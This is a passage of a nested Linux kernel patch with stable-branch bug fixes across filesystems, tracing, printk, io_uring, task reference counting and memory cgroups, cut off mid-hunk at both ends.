+@@ -269,6 +269,7 @@ int dbUnmount(struct inode *ipbmap, int mounterror)
+ 
+ 	/* free the memory for the in-memory bmap. */
+ 	kfree(bmp);
++	JFS_SBI(ipbmap->i_sb)->bmap = NULL;
+ 
+ 	return (0);
+ }
+diff --git a/fs/jfs/jfs_imap.c b/fs/jfs/jfs_imap.c
+index 799d3837e7c2b..4899663996d81 100644
+--- a/fs/jfs/jfs_imap.c
++++ b/fs/jfs/jfs_imap.c
+@@ -193,6 +193,7 @@ int diUnmount(struct inode *ipimap, int mounterror)
+ 	 * free in-memory control structure
+ 	 */
+ 	kfree(imap);
++	JFS_IP(ipimap)->i_imap = NULL;
+ 
+ 	return (0);
+ }
+diff --git a/fs/locks.c b/fs/locks.c
+index 240b9309ed6d5..1047ab2b15e96 100644
+--- a/fs/locks.c
++++ b/fs/locks.c
+@@ -1300,6 +1300,7 @@ retry:
+  out:
+ 	spin_unlock(&ctx->flc_lock);
+ 	percpu_up_read(&file_rwsem);
++	trace_posix_lock_inode(inode, request, error);
+ 	/*
+ 	 * Free any unused locks.
+ 	 */
+@@ -1308,7 +1309,6 @@ retry:
+ 	if (new_fl2)
+ 		locks_free_lock(new_fl2);
+ 	locks_dispose_list(&dispose);
+-	trace_posix_lock_inode(inode, request, error);
+ 
+ 	return error;
+ }
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index a90e792a94d77..a9105e95b59c5 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -1029,8 +1029,8 @@ nfsd4_rename(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 			     rename->rn_tname, rename->rn_tnamelen);
+ 	if (status)
+ 		return status;
+-	set_change_info(&rename->rn_sinfo, &cstate->current_fh);
+-	set_change_info(&rename->rn_tinfo, &cstate->save_fh);
++	set_change_info(&rename->rn_sinfo, &cstate->save_fh);
++	set_change_info(&rename->rn_tinfo, &cstate->current_fh);
+ 	return nfs_ok;
+ }
+ 
+diff --git a/fs/overlayfs/copy_up.c b/fs/overlayfs/copy_up.c
+index edc1ebff33f5a..e6d711f42607b 100644
+--- a/fs/overlayfs/copy_up.c
++++ b/fs/overlayfs/copy_up.c
+@@ -580,7 +580,8 @@ static int ovl_copy_up_metadata(struct ovl_copy_up_ctx *c, struct dentry *temp)
+ 	if (err)
+ 		return err;
+ 
+-	if (inode->i_flags & OVL_COPY_I_FLAGS_MASK) {
++	if (inode->i_flags & OVL_COPY_I_FLAGS_MASK &&
++	    (S_ISREG(c->stat.mode) || S_ISDIR(c->stat.mode))) {
+ 		/*
+ 		 * Copy the fileattr inode flags that are the source of already
+ 		 * copied i_flags
+diff --git a/fs/overlayfs/file.c b/fs/overlayfs/file.c
+index 6011f955436ba..cc0c077165bde 100644
+--- a/fs/overlayfs/file.c
++++ b/fs/overlayfs/file.c
+@@ -19,7 +19,6 @@ struct ovl_aio_req {
+ 	struct kiocb iocb;
+ 	refcount_t ref;
+ 	struct kiocb *orig_iocb;
+-	struct fd fd;
+ };
+ 
+ static struct kmem_cache *ovl_aio_request_cachep;
+@@ -260,7 +259,7 @@ static rwf_t ovl_iocb_to_rwf(int ifl)
+ static inline void ovl_aio_put(struct ovl_aio_req *aio_req)
+ {
+ 	if (refcount_dec_and_test(&aio_req->ref)) {
+-		fdput(aio_req->fd);
++		fput(aio_req->iocb.ki_filp);
+ 		kmem_cache_free(ovl_aio_request_cachep, aio_req);
+ 	}
+ }
+@@ -325,10 +324,9 @@ static ssize_t ovl_read_iter(struct kiocb *iocb, struct iov_iter *iter)
+ 		if (!aio_req)
+ 			goto out;
+ 
+-		aio_req->fd = real;
+ 		real.flags = 0;
+ 		aio_req->orig_iocb = iocb;
+-		kiocb_clone(&aio_req->iocb, iocb, real.file);
++		kiocb_clone(&aio_req->iocb, iocb, get_file(real.file));
+ 		aio_req->iocb.ki_complete = ovl_aio_rw_complete;
+ 		refcount_set(&aio_req->ref, 2);
+ 		ret = vfs_iocb_iter_read(real.file, &aio_req->iocb, iter);
+@@ -396,10 +394,9 @@ static ssize_t ovl_write_iter(struct kiocb *iocb, struct iov_iter *iter)
+ 		/* Pacify lockdep, same trick as done in aio_write() */
+ 		__sb_writers_release(file_inode(real.file)->i_sb,
+ 				     SB_FREEZE_WRITE);
+-		aio_req->fd = real;
+ 		real.flags = 0;
+ 		aio_req->orig_iocb = iocb;
+-		kiocb_clone(&aio_req->iocb, iocb, real.file);
++		kiocb_clone(&aio_req->iocb, iocb, get_file(real.file));
+ 		aio_req->iocb.ki_flags = ifl;
+ 		aio_req->iocb.ki_complete = ovl_aio_rw_complete;
+ 		refcount_set(&aio_req->ref, 2);
+diff --git a/fs/tracefs/inode.c b/fs/tracefs/inode.c
+index da85b39791957..6541d917e15e1 100644
+--- a/fs/tracefs/inode.c
++++ b/fs/tracefs/inode.c
+@@ -556,6 +556,9 @@ static struct dentry *__create_dir(const char *name, struct dentry *parent,
+  */
+ struct dentry *tracefs_create_dir(const char *name, struct dentry *parent)
+ {
++	if (security_locked_down(LOCKDOWN_TRACEFS))
++		return NULL;
++
+ 	return __create_dir(name, parent, &simple_dir_inode_operations);
+ }
+ 
+diff --git a/include/linux/acpi_iort.h b/include/linux/acpi_iort.h
+index b43be0987b19e..a2a51fafa3550 100644
+--- a/include/linux/acpi_iort.h
++++ b/include/linux/acpi_iort.h
+@@ -21,6 +21,7 @@
+  */
+ #define IORT_SMMU_V3_PMCG_GENERIC        0x00000000 /* Generic SMMUv3 PMCG */
+ #define IORT_SMMU_V3_PMCG_HISI_HIP08     0x00000001 /* HiSilicon HIP08 PMCG */
++#define IORT_SMMU_V3_PMCG_HISI_HIP09     0x00000002 /* HiSilicon HIP09 PMCG */
+ 
+ int iort_register_domain_token(int trans_id, phys_addr_t base,
+ 			       struct fwnode_handle *fw_node);
+diff --git a/include/linux/bvec.h b/include/linux/bvec.h
+index 35c25dff651a5..9e3dac51eb26b 100644
+--- a/include/linux/bvec.h
++++ b/include/linux/bvec.h
+@@ -35,6 +35,21 @@ struct bio_vec {
+ 	unsigned int	bv_offset;
+ };
+ 
++/**
++ * bvec_set_page - initialize a bvec based off a struct page
++ * @bv:		bvec to initialize
++ * @page:	page the bvec should point to
++ * @len:	length of the bvec
++ * @offset:	offset into the page
++ */
++static inline void bvec_set_page(struct bio_vec *bv, struct page *page,
++		unsigned int len, unsigned int offset)
++{
++	bv->bv_page = page;
++	bv->bv_len = len;
++	bv->bv_offset = offset;
++}
++
+ struct bvec_iter {
+ 	sector_t		bi_sector;	/* device address in 512 byte
+ 						   sectors */
+diff --git a/include/linux/dma-buf.h b/include/linux/dma-buf.h
+index 71731796c8c3a..9c31f1f430d8e 100644
+--- a/include/linux/dma-buf.h
++++ b/include/linux/dma-buf.h
+@@ -627,6 +627,12 @@ int dma_buf_begin_cpu_access(struct dma_buf *dma_buf,
+ 			     enum dma_data_direction dir);
+ int dma_buf_end_cpu_access(struct dma_buf *dma_buf,
+ 			   enum dma_data_direction dir);
++struct sg_table *
++dma_buf_map_attachment_unlocked(struct dma_buf_attachment *attach,
++				enum dma_data_direction direction);
++void dma_buf_unmap_attachment_unlocked(struct dma_buf_attachment *attach,
++				       struct sg_table *sg_table,
++				       enum dma_data_direction direction);
+ 
+ int dma_buf_mmap(struct dma_buf *, struct vm_area_struct *,
+ 		 unsigned long);
+diff --git a/include/linux/instruction_pointer.h b/include/linux/instruction_pointer.h
+index cda1f706eaeb1..aa0b3ffea9353 100644
+--- a/include/linux/instruction_pointer.h
++++ b/include/linux/instruction_pointer.h
+@@ -2,7 +2,12 @@
+ #ifndef _LINUX_INSTRUCTION_POINTER_H
+ #define _LINUX_INSTRUCTION_POINTER_H
+ 
++#include <asm/linkage.h>
++
+ #define _RET_IP_		(unsigned long)__builtin_return_address(0)
++
++#ifndef _THIS_IP_
+ #define _THIS_IP_  ({ __label__ __here; __here: (unsigned long)&&__here; })
++#endif
+ 
+ #endif /* _LINUX_INSTRUCTION_POINTER_H */
+diff --git a/include/linux/libata.h b/include/linux/libata.h
+index 9713f4d8f15f4..4c9b322bb3d88 100644
+--- a/include/linux/libata.h
++++ b/include/linux/libata.h
+@@ -216,6 +216,10 @@ enum {
+ 	ATA_HOST_PARALLEL_SCAN	= (1 << 2),	/* Ports on this host can be scanned in parallel */
+ 	ATA_HOST_IGNORE_ATA	= (1 << 3),	/* Ignore ATA devices on this host. */
+ 
++	ATA_HOST_NO_PART	= (1 << 4), /* Host does not support partial */
++	ATA_HOST_NO_SSC		= (1 << 5), /* Host does not support slumber */
++	ATA_HOST_NO_DEVSLP	= (1 << 6), /* Host does not support devslp */
++
+ 	/* bits 24:31 of host->flags are reserved for LLD specific flags */
+ 
+ 	/* various lengths of time */
+diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h
+index 0031f7b4d9aba..63fae3c7ae430 100644
+--- a/include/linux/perf_event.h
++++ b/include/linux/perf_event.h
+@@ -1139,15 +1139,31 @@ extern int perf_event_output(struct perf_event *event,
+ 			     struct pt_regs *regs);
+ 
+ static inline bool
+-is_default_overflow_handler(struct perf_event *event)
++__is_default_overflow_handler(perf_overflow_handler_t overflow_handler)
+ {
+-	if (likely(event->overflow_handler == perf_event_output_forward))
++	if (likely(overflow_handler == perf_event_output_forward))
+ 		return true;
+-	if (unlikely(event->overflow_handler == perf_event_output_backward))
++	if (unlikely(overflow_handler == perf_event_output_backward))
+ 		return true;
+ 	return false;
+ }
+ 
++#define is_default_overflow_handler(event) \
++	__is_default_overflow_handler((event)->overflow_handler)
++
++#ifdef CONFIG_BPF_SYSCALL
++static inline bool uses_default_overflow_handler(struct perf_event *event)
++{
++	if (likely(is_default_overflow_handler(event)))
++		return true;
++
++	return __is_default_overflow_handler(event->orig_overflow_handler);
++}
++#else
++#define uses_default_overflow_handler(event) \
++	is_default_overflow_handler(event)
++#endif
++
+ extern void
+ perf_event_header__init_id(struct perf_event_header *header,
+ 			   struct perf_sample_data *data,
+diff --git a/include/linux/sched/task.h b/include/linux/sched/task.h
+index 357e0068497c1..7291fb6399d2a 100644
+--- a/include/linux/sched/task.h
++++ b/include/linux/sched/task.h
+@@ -112,10 +112,36 @@ static inline struct task_struct *get_task_struct(struct task_struct *t)
+ }
+ 
+ extern void __put_task_struct(struct task_struct *t);
++extern void __put_task_struct_rcu_cb(struct rcu_head *rhp);
+ 
+ static inline void put_task_struct(struct task_struct *t)
+ {
+-	if (refcount_dec_and_test(&t->usage))
++	if (!refcount_dec_and_test(&t->usage))
++		return;
++
++	/*
++	 * under PREEMPT_RT, we can't call put_task_struct
++	 * in atomic context because it will indirectly
++	 * acquire sleeping locks.
++	 *
++	 * call_rcu() will schedule delayed_put_task_struct_rcu()
++	 * to be called in process context.
++	 *
++	 * __put_task_struct() is called when
++	 * refcount_dec_and_test(&t->usage) succeeds.
++	 *
++	 * This means that it can't "conflict" with
++	 * put_task_struct_rcu_user() which abuses ->rcu the same
++	 * way; rcu_users has a reference so task->usage can't be
++	 * zero after rcu_users 1 -> 0 transition.
++	 *
++	 * delayed_free_task() also uses ->rcu, but it is only called
++	 * when it fails to fork a process. Therefore, there is no
++	 * way it can conflict with put_task_struct().
++	 */
++	if (IS_ENABLED(CONFIG_PREEMPT_RT) && !preemptible())
++		call_rcu(&t->rcu, __put_task_struct_rcu_cb);
++	else
+ 		__put_task_struct(t);
+ }
+ 
+diff --git a/include/linux/usb/chipidea.h b/include/linux/usb/chipidea.h
+index ee38835ed77cc..0b4f2d5faa080 100644
+--- a/include/linux/usb/chipidea.h
++++ b/include/linux/usb/chipidea.h
+@@ -63,6 +63,7 @@ struct ci_hdrc_platform_data {
+ #define CI_HDRC_IMX_IS_HSIC		BIT(14)
+ #define CI_HDRC_PMQOS			BIT(15)
+ #define CI_HDRC_PHY_VBUS_CONTROL	BIT(16)
++#define CI_HDRC_HAS_PORTSC_PEC_MISSED	BIT(17)
+ 	enum usb_dr_mode	dr_mode;
+ #define CI_HDRC_CONTROLLER_RESET_EVENT		0
+ #define CI_HDRC_CONTROLLER_STOPPED_EVENT	1
+diff --git a/include/uapi/linux/netfilter_bridge/ebtables.h b/include/uapi/linux/netfilter_bridge/ebtables.h
+index a494cf43a7552..b0caad82b6937 100644
+--- a/include/uapi/linux/netfilter_bridge/ebtables.h
++++ b/include/uapi/linux/netfilter_bridge/ebtables.h
+@@ -182,12 +182,14 @@ struct ebt_entry {
+ 	unsigned char sourcemsk[ETH_ALEN];
+ 	unsigned char destmac[ETH_ALEN];
+ 	unsigned char destmsk[ETH_ALEN];
+-	/* sizeof ebt_entry + matches */
+-	unsigned int watchers_offset;
+-	/* sizeof ebt_entry + matches + watchers */
+-	unsigned int target_offset;
+-	/* sizeof ebt_entry + matches + watchers + target */
+-	unsigned int next_offset;
++	__struct_group(/* no tag */, offsets, /* no attrs */,
++		/* sizeof ebt_entry + matches */
++		unsigned int watchers_offset;
++		/* sizeof ebt_entry + matches + watchers */
++		unsigned int target_offset;
++		/* sizeof ebt_entry + matches + watchers + target */
++		unsigned int next_offset;
++	);
+ 	unsigned char elems[0] __attribute__ ((aligned (__alignof__(struct ebt_replace))));
+ };
+ 
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 7245218fdbe2b..9fe1aada3ad00 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -170,6 +170,10 @@ static int io_setup_async_msg(struct io_kiocb *req,
+ 	memcpy(async_msg, kmsg, sizeof(*kmsg));
+ 	if (async_msg->msg.msg_name)
+ 		async_msg->msg.msg_name = &async_msg->addr;
++
++	if ((req->flags & REQ_F_BUFFER_SELECT) && !async_msg->msg.msg_iter.nr_segs)
++		return -EAGAIN;
++
+ 	/* if were using fast_iov, set it to the new one */
+ 	if (!kmsg->free_iov) {
+ 		size_t fast_idx = kmsg->msg.msg_iter.iov - kmsg->fast_iov;
+@@ -529,6 +533,7 @@ static int io_recvmsg_copy_hdr(struct io_kiocb *req,
+ 			       struct io_async_msghdr *iomsg)
+ {
+ 	iomsg->msg.msg_name = &iomsg->addr;
++	iomsg->msg.msg_iter.nr_segs = 0;
+ 
+ #ifdef CONFIG_COMPAT
+ 	if (req->ctx->compat)
+diff --git a/kernel/fork.c b/kernel/fork.c
+index 41950ff90aa34..85617928041cf 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -852,6 +852,14 @@ void __put_task_struct(struct task_struct *tsk)
+ }
+ EXPORT_SYMBOL_GPL(__put_task_struct);
+ 
++void __put_task_struct_rcu_cb(struct rcu_head *rhp)
++{
++	struct task_struct *task = container_of(rhp, struct task_struct, rcu);
++
++	__put_task_struct(task);
++}
++EXPORT_SYMBOL_GPL(__put_task_struct_rcu_cb);
++
+ void __init __weak arch_task_cache_init(void) { }
+ 
+ /*
+diff --git a/kernel/panic.c b/kernel/panic.c
+index ca5452afb456d..63e94f3bd8dcd 100644
+--- a/kernel/panic.c
++++ b/kernel/panic.c
+@@ -695,6 +695,7 @@ void warn_slowpath_fmt(const char *file, int line, unsigned taint,
+ 	if (!fmt) {
+ 		__warn(file, line, __builtin_return_address(0), taint,
+ 		       NULL, NULL);
++		warn_rcu_exit(rcu);
+ 		return;
+ 	}
+ 
+diff --git a/kernel/printk/printk.c b/kernel/printk/printk.c
+index e4f1e7478b521..cc53fb77f77cc 100644
+--- a/kernel/printk/printk.c
++++ b/kernel/printk/printk.c
+@@ -2269,7 +2269,11 @@ asmlinkage int vprintk_emit(int facility, int level,
+ 		preempt_enable();
+ 	}
+ 
+-	wake_up_klogd();
++	if (in_sched)
++		defer_console_output();
++	else
++		wake_up_klogd();
++
+ 	return printed_len;
+ }
+ EXPORT_SYMBOL(vprintk_emit);
+@@ -2552,6 +2556,25 @@ static int console_cpu_notify(unsigned int cpu)
+ 	return 0;
+ }
+ 
++/*
++ * Return true when this CPU should unlock console_sem without pushing all
++ * messages to the console. This reduces the chance that the console is
++ * locked when the panic CPU tries to use it.
++ */
++static bool abandon_console_lock_in_panic(void)
++{
++	if (!panic_in_progress())
++		return false;
++
++	/*
++	 * We can use raw_smp_processor_id() here because it is impossible for
++	 * the task to be migrated to the panic_cpu, or away from it. If
++	 * panic_cpu has already been set, and we're not currently executing on
++	 * that CPU, then we never will be.
++	 */
++	return atomic_read(&panic_cpu) != raw_smp_processor_id();
++}
++
+ /**
+  * console_lock - lock the console system for exclusive use.
+  *
+@@ -2564,6 +2587,10 @@ void console_lock(void)
+ {
+ 	might_sleep();
+ 
++	/* On panic, the console_lock must be left to the panic cpu. */
++	while (abandon_console_lock_in_panic())
++		msleep(1000);
++
+ 	down_console_sem();
+ 	if (console_suspended)
+ 		return;
+@@ -2582,6 +2609,9 @@ EXPORT_SYMBOL(console_lock);
+  */
+ int console_trylock(void)
+ {
++	/* On panic, the console_lock must be left to the panic cpu. */
++	if (abandon_console_lock_in_panic())
++		return 0;
+ 	if (down_trylock_console_sem())
+ 		return 0;
+ 	if (console_suspended) {
+@@ -2600,25 +2630,6 @@ int is_console_locked(void)
+ }
+ EXPORT_SYMBOL(is_console_locked);
+ 
+-/*
+- * Return true when this CPU should unlock console_sem without pushing all
+- * messages to the console. This reduces the chance that the console is
+- * locked when the panic CPU tries to use it.
+- */
+-static bool abandon_console_lock_in_panic(void)
+-{
+-	if (!panic_in_progress())
+-		return false;
+-
+-	/*
+-	 * We can use raw_smp_processor_id() here because it is impossible for
+-	 * the task to be migrated to the panic_cpu, or away from it. If
+-	 * panic_cpu has already been set, and we're not currently executing on
+-	 * that CPU, then we never will be.
+-	 */
+-	return atomic_read(&panic_cpu) != raw_smp_processor_id();
+-}
+-
+ /*
+  * Check if the given console is currently capable and allowed to print
+  * records.
+@@ -3483,11 +3494,33 @@ static void __wake_up_klogd(int val)
+ 	preempt_enable();
+ }
+ 
++/**
++ * wake_up_klogd - Wake kernel logging daemon
++ *
++ * Use this function when new records have been added to the ringbuffer
++ * and the console printing of those records has already occurred or is
++ * known to be handled by some other context. This function will only
++ * wake the logging daemon.
++ *
++ * Context: Any context.
++ */
+ void wake_up_klogd(void)
+ {
+ 	__wake_up_klogd(PRINTK_PENDING_WAKEUP);
+ }
+ 
++/**
++ * defer_console_output - Wake kernel logging daemon and trigger
++ *	console printing in a deferred context
++ *
++ * Use this function when new records have been added to the ringbuffer,
++ * this context is responsible for console printing those records, but
++ * the current context is not allowed to perform the console printing.
++ * Trigger an irq_work context to perform the console printing. This
++ * function also wakes the logging daemon.
++ *
++ * Context: Any context.
++ */
+ void defer_console_output(void)
+ {
+ 	/*
+@@ -3504,12 +3537,7 @@ void printk_trigger_flush(void)
+ 
+ int vprintk_deferred(const char *fmt, va_list args)
+ {
+-	int r;
+-
+-	r = vprintk_emit(0, LOGLEVEL_SCHED, NULL, fmt, args);
+-	defer_console_output();
+-
+-	return r;
++	return vprintk_emit(0, LOGLEVEL_SCHED, NULL, fmt, args);
+ }
+ 
+ int _printk_deferred(const char *fmt, ...)
+diff --git a/kernel/printk/printk_safe.c b/kernel/printk/printk_safe.c
+index ef0f9a2044da1..6d10927a07d83 100644
+--- a/kernel/printk/printk_safe.c
++++ b/kernel/printk/printk_safe.c
+@@ -38,13 +38,8 @@ asmlinkage int vprintk(const char *fmt, va_list args)
+ 	 * Use the main logbuf even in NMI. But avoid calling console
+ 	 * drivers that might have their own locks.
+ 	 */
+-	if (this_cpu_read(printk_context) || in_nmi()) {
+-		int len;
+-
+-		len = vprintk_store(0, LOGLEVEL_DEFAULT, NULL, fmt, args);
+-		defer_console_output();
+-		return len;
+-	}
++	if (this_cpu_read(printk_context) || in_nmi())
++		return vprintk_deferred(fmt, args);
+ 
+ 	/* No obstacles. */
+ 	return vprintk_default(fmt, args);
+diff --git a/kernel/rcu/rcuscale.c b/kernel/rcu/rcuscale.c
+index 7854dc3226e1b..0b88d96511adc 100644
+--- a/kernel/rcu/rcuscale.c
++++ b/kernel/rcu/rcuscale.c
+@@ -423,7 +423,7 @@ rcu_scale_writer(void *arg)
+ 	sched_set_fifo_low(current);
+ 
+ 	if (holdoff)
+-		schedule_timeout_uninterruptible(holdoff * HZ);
++		schedule_timeout_idle(holdoff * HZ);
+ 
+ 	/*
+ 	 * Wait until rcu_end_inkernel_boot() is called for normal GP tests
+diff --git a/kernel/scftorture.c b/kernel/scftorture.c
+index 5d113aa59e773..83c33ba0ca7e0 100644
+--- a/kernel/scftorture.c
++++ b/kernel/scftorture.c
+@@ -171,7 +171,8 @@ static void scf_torture_stats_print(void)
+ 		scfs.n_all_wait += scf_stats_p[i].n_all_wait;
+ 	}
+ 	if (atomic_read(&n_errs) || atomic_read(&n_mb_in_errs) ||
+-	    atomic_read(&n_mb_out_errs) || atomic_read(&n_alloc_errs))
++	    atomic_read(&n_mb_out_errs) ||
++	    (!IS_ENABLED(CONFIG_KASAN) && atomic_read(&n_alloc_errs)))
+ 		bangstr = "!!! ";
+ 	pr_alert("%s %sscf_invoked_count %s: %lld resched: %lld single: %lld/%lld single_ofl: %lld/%lld single_rpc: %lld single_rpc_ofl: %lld many: %lld/%lld all: %lld/%lld ",
+ 		 SCFTORT_FLAG, bangstr, isdone ? "VER" : "ver", invoked_count, scfs.n_resched,
+@@ -323,7 +324,8 @@ static void scftorture_invoke_one(struct scf_statistics *scfp, struct torture_ra
+ 		preempt_disable();
+ 	if (scfsp->scfs_prim == SCF_PRIM_SINGLE || scfsp->scfs_wait) {
+ 		scfcp = kmalloc(sizeof(*scfcp), GFP_ATOMIC);
+-		if (WARN_ON_ONCE(!scfcp)) {
++		if (!scfcp) {
++			WARN_ON_ONCE(!IS_ENABLED(CONFIG_KASAN));
+ 			atomic_inc(&n_alloc_errs);
+ 		} else {
+ 			scfcp->scfc_cpu = -1;
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 54ccdca395311..9db92a6e14636 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -1729,7 +1729,7 @@ static void trace_create_maxlat_file(struct trace_array *tr,
+ 	init_irq_work(&tr->fsnotify_irqwork, latency_fsnotify_workfn_irq);
+ 	tr->d_max_latency = trace_create_file("tracing_max_latency",
+ 					      TRACE_MODE_WRITE,
+-					      d_tracer, &tr->max_latency,
++					      d_tracer, tr,
+ 					      &tracing_max_lat_fops);
+ }
+ 
+@@ -1762,7 +1762,7 @@ void latency_fsnotify(struct trace_array *tr)
+ 
+ #define trace_create_maxlat_file(tr, d_tracer)				\
+ 	trace_create_file("tracing_max_latency", TRACE_MODE_WRITE,	\
+-			  d_tracer, &tr->max_latency, &tracing_max_lat_fops)
++			  d_tracer, tr, &tracing_max_lat_fops)
+ 
+ #endif
+ 
+@@ -4899,6 +4899,33 @@ int tracing_open_generic_tr(struct inode *inode, struct file *filp)
+ 	return 0;
+ }
+ 
++/*
++ * The private pointer of the inode is the trace_event_file.
++ * Update the tr ref count associated to it.
++ */
++int tracing_open_file_tr(struct inode *inode, struct file *filp)
++{
++	struct trace_event_file *file = inode->i_private;
++	int ret;
++
++	ret = tracing_check_open_get_tr(file->tr);
++	if (ret)
++		return ret;
++
++	filp->private_data = inode->i_private;
++
++	return 0;
++}
++
++int tracing_release_file_tr(struct inode *inode, struct file *filp)
++{
++	struct trace_event_file *file = inode->i_private;
++
++	trace_array_put(file->tr);
++
++	return 0;
++}
++
+ static int tracing_mark_open(struct inode *inode, struct file *filp)
+ {
+ 	stream_open(inode, filp);
+@@ -6604,14 +6631,18 @@ static ssize_t
+ tracing_max_lat_read(struct file *filp, char __user *ubuf,
+ 		     size_t cnt, loff_t *ppos)
+ {
+-	return tracing_nsecs_read(filp->private_data, ubuf, cnt, ppos);
++	struct trace_array *tr = filp->private_data;
++
++	return tracing_nsecs_read(&tr->max_latency, ubuf, cnt, ppos);
+ }
+ 
+ static ssize_t
+ tracing_max_lat_write(struct file *filp, const char __user *ubuf,
+ 		      size_t cnt, loff_t *ppos)
+ {
+-	return tracing_nsecs_write(filp->private_data, ubuf, cnt, ppos);
++	struct trace_array *tr = filp->private_data;
++
++	return tracing_nsecs_write(&tr->max_latency, ubuf, cnt, ppos);
+ }
+ 
+ #endif
+@@ -7668,18 +7699,20 @@ static const struct file_operations tracing_thresh_fops = {
+ 
+ #ifdef CONFIG_TRACER_MAX_TRACE
+ static const struct file_operations tracing_max_lat_fops = {
+-	.open		= tracing_open_generic,
++	.open		= tracing_open_generic_tr,
+ 	.read		= tracing_max_lat_read,
+ 	.write		= tracing_max_lat_write,
+ 	.llseek		= generic_file_llseek,
++	.release	= tracing_release_generic_tr,
+ };
+ #endif
+ 
+ static const struct file_operations set_tracer_fops = {
+-	.open		= tracing_open_generic,
++	.open		= tracing_open_generic_tr,
+ 	.read		= tracing_set_trace_read,
+ 	.write		= tracing_set_trace_write,
+ 	.llseek		= generic_file_llseek,
++	.release	= tracing_release_generic_tr,
+ };
+ 
+ static const struct file_operations tracing_pipe_fops = {
+@@ -8872,12 +8905,33 @@ trace_options_write(struct file *filp, const char __user *ubuf, size_t cnt,
+ 	return cnt;
+ }
+ 
++static int tracing_open_options(struct inode *inode, struct file *filp)
++{
++	struct trace_option_dentry *topt = inode->i_private;
++	int ret;
++
++	ret = tracing_check_open_get_tr(topt->tr);
++	if (ret)
++		return ret;
++
++	filp->private_data = inode->i_private;
++	return 0;
++}
++
++static int tracing_release_options(struct inode *inode, struct file *file)
++{
++	struct trace_option_dentry *topt = file->private_data;
++
++	trace_array_put(topt->tr);
++	return 0;
++}
+ 
+ static const struct file_operations trace_options_fops = {
+-	.open = tracing_open_generic,
++	.open = tracing_open_options,
+ 	.read = trace_options_read,
+ 	.write = trace_options_write,
+ 	.llseek	= generic_file_llseek,
++	.release = tracing_release_options,
+ };
+ 
+ /*
+diff --git a/kernel/trace/trace.h b/kernel/trace/trace.h
+index dbb86b0dd3b7b..7e6d5101bdb05 100644
+--- a/kernel/trace/trace.h
++++ b/kernel/trace/trace.h
+@@ -590,6 +590,8 @@ void tracing_reset_all_online_cpus(void);
+ void tracing_reset_all_online_cpus_unlocked(void);
+ int tracing_open_generic(struct inode *inode, struct file *filp);
+ int tracing_open_generic_tr(struct inode *inode, struct file *filp);
++int tracing_open_file_tr(struct inode *inode, struct file *filp);
++int tracing_release_file_tr(struct inode *inode, struct file *filp);
+ bool tracing_is_disabled(void);
+ bool tracer_tracing_is_on(struct trace_array *tr);
+ void tracer_tracing_on(struct trace_array *tr);
+diff --git a/kernel/trace/trace_events.c b/kernel/trace/trace_events.c
+index 0447c46ef4d71..9da418442a063 100644
+--- a/kernel/trace/trace_events.c
++++ b/kernel/trace/trace_events.c
+@@ -2101,9 +2101,10 @@ static const struct file_operations ftrace_set_event_notrace_pid_fops = {
+ };
+ 
+ static const struct file_operations ftrace_enable_fops = {
+-	.open = tracing_open_generic,
++	.open = tracing_open_file_tr,
+ 	.read = event_enable_read,
+ 	.write = event_enable_write,
++	.release = tracing_release_file_tr,
+ 	.llseek = default_llseek,
+ };
+ 
+@@ -2120,9 +2121,10 @@ static const struct file_operations ftrace_event_id_fops = {
+ };
+ 
+ static const struct file_operations ftrace_event_filter_fops = {
+-	.open = tracing_open_generic,
++	.open = tracing_open_file_tr,
+ 	.read = event_filter_read,
+ 	.write = event_filter_write,
++	.release = tracing_release_file_tr,
+ 	.llseek = default_llseek,
+ };
+ 
+diff --git a/kernel/trace/trace_events_inject.c b/kernel/trace/trace_events_inject.c
+index d6b4935a78c08..dbecfbb73d237 100644
+--- a/kernel/trace/trace_events_inject.c
++++ b/kernel/trace/trace_events_inject.c
+@@ -328,7 +328,8 @@ event_inject_read(struct file *file, char __user *buf, size_t size,
+ }
+ 
+ const struct file_operations event_inject_fops = {
+-	.open = tracing_open_generic,
++	.open = tracing_open_file_tr,
+ 	.read = event_inject_read,
+ 	.write = event_inject_write,
++	.release = tracing_release_file_tr,
+ };
+diff --git a/lib/kobject.c b/lib/kobject.c
+index aa375a5d94419..207fd22ad3bde 100644
+--- a/lib/kobject.c
++++ b/lib/kobject.c
+@@ -850,6 +850,11 @@ int kset_register(struct kset *k)
+ 	if (!k)
+ 		return -EINVAL;
+ 
++	if (!k->kobj.ktype) {
++		pr_err("must have a ktype to be initialized properly!\n");
++		return -EINVAL;
++	}
++
+ 	kset_init(k);
+ 	err = kobject_add_internal(&k->kobj);
+ 	if (err)
+diff --git a/lib/mpi/mpi-cmp.c b/lib/mpi/mpi-cmp.c
+index c4cfa3ff05818..0835b6213235e 100644
+--- a/lib/mpi/mpi-cmp.c
++++ b/lib/mpi/mpi-cmp.c
+@@ -25,8 +25,12 @@ int mpi_cmp_ui(MPI u, unsigned long v)
+ 	mpi_limb_t limb = v;
+ 
+ 	mpi_normalize(u);
+-	if (!u->nlimbs && !limb)
+-		return 0;
++	if (u->nlimbs == 0) {
++		if (v == 0)
++			return 0;
++		else
++			return -1;
++	}
+ 	if (u->sign)
+ 		return -1;
+ 	if (u->nlimbs > 1)
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 0a403b241718e..67b6d8238b3ed 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -3841,6 +3841,10 @@ static ssize_t mem_cgroup_write(struct kernfs_open_file *of,
+ 		case _MEMSWAP:
+ 			ret = mem_cgroup_resize_max(memcg, nr_pages, true);
+ 			break;
++		case _KMEM:
++			/* kmem.limit_in_bytes is deprecated. */
++			ret = -EOPNOTSUPP;
++			break;
+ 		case _TCP:
+ 			ret = memcg_update_tcp_max(memcg, nr_pages);
+ 			break;
+@@ -5051,6 +5055,12 @@ static struct cftype mem_cgroup_legacy_files[] = {
+ 		.seq_show = memcg_numa_stat_show,
+ 	},
+ #endif
++	{
++		.name = "kmem.limit_in_bytes",
